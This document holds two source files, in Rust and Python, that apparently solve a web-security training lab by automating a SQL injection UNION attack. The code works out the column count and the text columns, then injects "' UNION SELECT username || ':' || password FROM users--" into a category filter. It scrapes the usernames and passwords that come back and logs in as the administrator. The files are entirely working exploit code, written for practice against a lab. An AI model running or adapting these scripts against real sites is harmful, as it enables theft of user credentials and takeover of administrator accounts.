File: with-rust/sql-injection/src/bin/06-union-attack-retrieving-multiple-values-in-a-single-column.rs
use scraper::{Html, Selector};
use sql_injection::{
    HTTP_CLIENT, check_is_lab_solved, find_columns_of_type_string, find_no_of_columns,
    generate_clap_parser, login_as_administrator,
};
use std::{collections::HashMap, sync::LazyLock};

static TABLE_TH_SELECTOR: LazyLock<Selector> = LazyLock::new(|| {
    Selector::parse("table tbody tr th").expect("Failed to construct the TABLE_TH_SELECTOR")
});

fn main() {
    let args = generate_clap_parser();

    let lab_url = args.lab_url.as_str().trim_end_matches("/");
    let lab_url_with_endpoint = format!("{lab_url}/filter?category=");

    let columns = find_no_of_columns(&lab_url_with_endpoint, None);

    let target_columns = find_columns_of_type_string(&lab_url_with_endpoint, columns, None);

    logger::info("Fetching the `username` and `password` columns from `users` table");

    let payload = (0..columns)
        .map(|column| {
            if target_columns.contains(&column) {
                "username || ':' || password".to_string()
            } else {
                "NULL".to_string()
            }
        })
        .collect::<Vec<String>>()
        .join(", ");

    let query = format!("' UNION SELECT {} FROM users--", payload);

    logger::info(format!("Making query: {}/filter?category={}", lab_url, query).as_ref());

    let response = HTTP_CLIENT
        .get(format!("{}/filter?category={}", lab_url, query))
        .send()
        .expect("[-] Failed to fetch the `username` and `password` columns from `users` table");

    if response.status() == 200 {
        let document = Html::parse_document(
            response
                .text()
                .expect("[-] Failed to extract the body")
                .as_ref(),
        );

        let rows: Vec<String> = document
            .select(&TABLE_TH_SELECTOR)
            .flat_map(|element_ref| element_ref.text())
            .map(str::to_string)
            .collect();

        let users_hashmap: HashMap<String, String> = rows
            .into_iter()
            .filter_map(|row| {
                let mut parts = row.splitn(2, ':');

                match (parts.next(), parts.next()) {
                    (Some(username), Some(password)) => {
                        Some((username.to_string(), password.to_string()))
                    }
                    _ => None,
                }
            })
            .collect();

        logger::success("Credentials found in the `users` table:");

        println!();
        for (username, password) in users_hashmap.iter() {
            println!("{}:{}", username, password);
        }
        println!();

        if users_hashmap.contains_key("administrator") {
            login_as_administrator(
                lab_url,
                users_hashmap.get("administrator").unwrap().to_string(),
            );
        } else {
            panic!(
                "{}",
                logger::error_return("administrator credential not found")
            );
        }
    } else {
        panic!(
            "{}",
            logger::error_return("Failed to fetch the usernames and passwords")
        );
    }

    check_is_lab_solved(lab_url);
}

File: with-python/sql-injection/06-union-attack-retrieving-multiple-values-in-a-single-column.py
from lib import (
    SESSION,
    login_as_administrator,
    generate_parser,
    find_no_of_columns,
    find_columns_of_type_string,
    check_is_lab_solved,
)
from lxml import html

if __name__ == "__main__":
    args = generate_parser()

    lab_url = args.lab_url.strip("/")

    columns = find_no_of_columns(f"{lab_url}/filter?category=")

    target_columns = find_columns_of_type_string(
        lab_url_with_end_point=f"{lab_url}/filter?category=",
        no_of_columns=columns,
    )

    print("[+] Fetching the `username` and `password` columns from `users` table")

    payload = ", ".join(
        [
            "username || ':' || password" if j in target_columns else "NULL"
            for j in range(columns)
        ]
    )

    query = f"' UNION SELECT {payload} FROM users--"

    print(f"[+] Making query: {lab_url}/filter?category={query}")

    response = SESSION.get(f"{lab_url}/filter?category={query}")

    if response.status_code == 200:
        tree = html.fromstring(response.text)

        rows = tree.xpath("//table/tbody/tr/th/text()")

        print("[+] Credentials found in the `users` table:")

        users_dict = dict()

        print()
        for row in rows:
            [username, password] = row.strip().split(":")
            users_dict[username] = password
            print(f"{username}:{password}")
        print()

        if users_dict.get("administrator"):
            administrator_password = users_dict.get("administrator")

            if administrator_password:
                login_as_administrator(lab_url, administrator_password)
            else:
                print("[-] administrator credential not found in the dict")
                exit()

        else:
            print("[-] administrator credential not found")
            exit()

    else:
        print("[-] Failed to fetch the usernames and passwords")
        exit()

    check_is_lab_solved(lab_url)
